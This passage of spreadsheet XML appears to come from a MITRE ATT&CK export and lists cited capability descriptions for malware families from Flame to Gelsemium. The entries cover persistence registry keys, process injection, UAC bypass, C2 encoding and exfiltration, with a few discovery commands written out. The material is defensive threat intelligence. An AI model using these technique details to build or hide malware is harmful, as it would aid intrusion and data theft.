    <t>[Flame](https://attack.mitre.org/software/S0143) can record audio using any existing hardware recording devices.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can use Windows Authentication Packages for persistence.(Citation: Crysys Skywiper)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.(Citation: Symantec Beetlejuice)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can create backdoor accounts with login “HelpAssistant” on domain connected systems if appropriate rights are available.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.(Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>Rundll32.exe is used as a way of executing [Flame](https://attack.mitre.org/software/S0143) at the command-line.(Citation: Crysys Skywiper)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can take regular screenshots when certain applications are open that are sent to the command and control server.(Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) identifies security software such as antivirus through the Security module.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect clipboard data.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) may obfuscate portions of the initial C2 handshake.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has collected information and files from a compromised machine.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has sent data collected from a compromised host to its C2 servers.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can execute batch scripts to delete files.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can transfer files from C2.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect mouse events.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect keyboard events.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) enumerates the privilege level of the victim during the initial infection.(Citation: Proofpoint TA505 Mar 2018)(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[FlawedAmmyy](https://attack.mitre.org/software/S0381) has been installed via `msiexec.exe`.(Citation: Korean FSI TA505 2020) </t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) will attempt to detect if a usable smart card is current inserted into a card reader.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used PowerShell to execute commands.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has established persistence via the `HKCU\SOFTWARE\microsoft\windows\currentversion\run` registry key.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used `rundll32` for execution.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can capture screenshots.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) will attempt to detect anti-virus products during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used SEAL encryption during the initial C2 handshake.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect the victim's operating system and computer name during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) enumerates the current user during the initial infection.(Citation: Proofpoint TA505 Mar 2018)(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used HTTP for C2.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used `cmd` to execute commands on a compromised host.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) leverages WMI to enumerate anti-virus on the victim.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedGrace](https://attack.mitre.org/software/S0383) encrypts its C2 configuration files with AES in CBC mode.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can use a dynamic XOR key and a custom XOR methodology to encode data before exfiltration. Also, [FoggyWeb](https://attack.mitre.org/software/S0661) can encode C2 command output within a legitimate WebP file.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can invoke the `Common.Compress` method to compress data with the C# GZipStream compression class.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can compile and execute source code sent to the compromised AD FS server via a specific HTTP POST.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader has used DLL Search Order Hijacking to load malicious code instead of the legitimate `version.dll` during the `Microsoft.IdentityServer.ServiceHost.exe` execution process.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can retrieve configuration data from a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can be decrypted in memory using a Lightweight Encryption Algorithm (LEA)-128 key and decoded using a XOR key.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can remotely exfiltrate sensitive information from a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can check for the [FoggyWeb](https://attack.mitre.org/software/S0661) backdoor .pri file on a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can receive additional malicious components from an actor controlled C2 server and execute them on a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can masquerade the output of C2 commands as a fake, but legitimately formatted WebP file.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can be disguised as a Visual Studio file such as `Windows.Data.TimeZones.zh-PH.pri` to evade detection. Also, [FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can mimic a genuine `dll` file that carries out the same import functions as the legitimate Windows `version.dll` file.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can use API functions to load the [FoggyWeb](https://attack.mitre.org/software/S0661) backdoor into the same Application Domain within which the legitimate AD FS managed code is executed.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can configure custom listeners to passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) has been XOR-encoded.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can retrieve token signing certificates and token decryption certificates from a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can enumerate all Common Language Runtimes (CLRs) and running Application Domains in the compromised AD FS server's &lt;code&gt;Microsoft.IdentityServer.ServiceHost.exe&lt;/code&gt; process.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader has reflectively loaded .NET-based assembly/payloads into memory.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can call the &lt;code&gt;load()&lt;/code&gt; function to load the [FoggyWeb](https://attack.mitre.org/software/S0661) dll into an Application Domain on a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[FoggyWeb](https://attack.mitre.org/software/S0661) has used a dynamic XOR key and custom XOR methodology for C2 communications.(Citation: MSTIC FoggyWeb September 2021)  </t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can allow abuse of a compromised AD FS server's SAML token.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) has the ability to communicate with C2 servers over HTTP GET/POST requests.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before).(Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)(Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to subvert controls and possibly conceal command execution by not directly invoking [cmd](https://attack.mitre.org/software/S0106).(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can XOR credit card information before exfiltration.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can collect elements related to credit card data from process memory.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can use DNS tunneling for exfiltration of credit card data.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\Windows\.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) will delete files on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) looks for specific files and file types.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) saves itself with a leading "." to make it a hidden file.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) persists via a Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) executes and stores obfuscated Perl scripts.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) has the ability to list processes on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) takes screenshots of the user's desktop.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to discover application windows via execution of `EnumWindows`.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has compressed collected files with zLib and encrypted them using an XOR operation with the string key from the command line or `qwerasdf` if the command line argument doesn’t contain the key. File names are obfuscated using XOR with the same key as the compressed file content.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has compressed collected files with zLib.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can monitor files for changes and automatically collect them.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can send compressed and obfuscated packets to C2.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can upload files from victims' machines.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: Kaspersky APT Trends Q1 2020)</t>
  </si>
  <si>
    <t>The [FunnyDream](https://attack.mitre.org/software/S1044) FilePakMonitor component has the ability to collect files from removable devices.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>The [FunnyDream](https://attack.mitre.org/software/S1044) FilepakMonitor component can inject into the Bka.exe process using the `VirtualAllocEx`, `WriteProcessMemory` and `CreateRemoteThread` APIs to load the DLL component.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can execute commands, including gathering user information, and send the results to C2.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can delete files including its dropper component.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to clean traces of malware deployment.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can download additional files onto a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>The [FunnyDream](https://attack.mitre.org/software/S1044) Keyrecord component can capture keystrokes.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can stage collected information including screen captures and logged keystrokes locally.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has used a service named `WSearch` for execution.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use Native API for defense evasion, discovery, and collection.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can communicate with C2 over TCP and UDP.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can Base64 encode its C2 address stored in a template binary with the `xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_-` or
`xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_=` character sets.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>The [FunnyDream](https://attack.mitre.org/software/S1044) FilepakMonitor component can detect removable drive insertion.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to discover processes, including `Bka.exe` and `BkavUtil.exe`.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can connect to HTTP proxies via TCP to create a tunnel to C2.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can identify and use configured proxies in a compromised network for C2 communication.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can check `Software\Microsoft\Windows\CurrentVersion\Internet Settings` to extract the `ProxyServer` string.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use a Registry Run Key and the Startup folder to establish persistence.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can collect information about hosts on the victim network.(Citation: Kaspersky APT Trends Q1 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use `rundll32` for execution of its components.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>The [FunnyDream](https://attack.mitre.org/software/S1044) ScreenCap component can take screenshots on a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can identify the processes for Bkav antivirus.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can enumerate all logical drives on a targeted machine.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can parse the `ProxyServer` string in the Registry to discover http proxies.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to gather user information from the targeted system using `whoami/upn&amp;whoami/fqdn&amp;whoami/logonid&amp;whoami/all`.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can check system time to help determine when changes were made to specified files.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use `cmd.exe` for execution on remote hosts.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use WMI to open a Windows command shell on a remote machine.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has the ability to delete files.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) has the ability to search for files.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) can perform keylogging.(Citation: Fysbis Palo Alto Analysis) </t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has masqueraded as the rsyncd and dbus-inotifier services.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has masqueraded as trusted software rsyncd and dbus-inotifier.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) has been encrypted using XOR and RC4.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) can collect information about running processes.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) can use Base64 to encode its C2 traffic.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has used the command &lt;code&gt;ls /etc | egrep -e"fedora\*|debian\*|gentoo\*|mandriva\*|mandrake\*|meego\*|redhat\*|lsb-\*|sun-\*|SUSE\*|release"&lt;/code&gt; to determine which Linux OS version is running.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has established persistence using a systemd service.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has the ability to create and execute commands in a remote shell for CLI.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has installed itself as an autostart entry under &lt;code&gt;~/.config/autostart/dbus-inotifier.desktop&lt;/code&gt; to establish persistence.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[GLOOXMAIL](https://attack.mitre.org/software/S0026) communicates to servers operated by Google using the Jabber/XMPP protocol.(Citation: Mandiant APT1)(Citation: CyberESI GTALK)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve Windows domain membership information.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[GRIFFON](https://attack.mitre.org/software/S0417) is written in and executed as [JavaScript](https://attack.mitre.org/techniques/T1059/007).(Citation: SecureList Griffon May 2019)	</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used PowerShell to execute the Meterpreter downloader TinyMet.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a persistence module that stores the implant inside the Registry, which executes at logon.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used &lt;code&gt;sctasks&lt;/code&gt; for persistence. (Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a screenshot module that can be used to take a screenshot of the remote system.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation .(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve the date and time of the system.(Citation: SecureList Griffon May 2019)	</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) uses custom encryption for C2 that uses RSA.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) versions are signed with various valid certificates; one was likely faked and issued by Comodo for "Solid Loop Ltd," and another was issued for "Ultimate Computer Support Ltd."(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) has commands to delete files and persistence mechanisms from the victim.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can execute a task to download a file.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) stores configuration items in alternate data streams (ADSs) if the Registry is not accessible.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) injects its communication module into an Internet accessible process through which it performs C2.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a .lnk file in the Start menu.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a scheduled task.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence through the system screensaver by configuring it to execute the malware.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) uses custom encryption for C2 that uses 3DES.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) obtains the current user's security identifier.(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>For early [Gazer](https://attack.mitre.org/software/S0168) versions, the compilation timestamp was faked.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) communicates with its C2 servers over HTTP.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt;.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use token manipulation to bypass UAC on Windows7 systems.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use junk code to hide functions and evade detection.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can bypass UAC to elevate process privileges on a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use the `IARPUinstallerStringLauncher` COM interface are part of its UAC bypass process.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to use DNS in communication with C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can collect data from a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can decompress and decrypt DLLs and shellcode.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use dynamic DNS domain names in C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to inject DLLs into specific processes.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use multiple domains and protocols in C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can delete its dropper component from the targeted system.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can retrieve data from specific Windows directories, as well as open random files as part of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497).(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can download additional plug-ins to a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
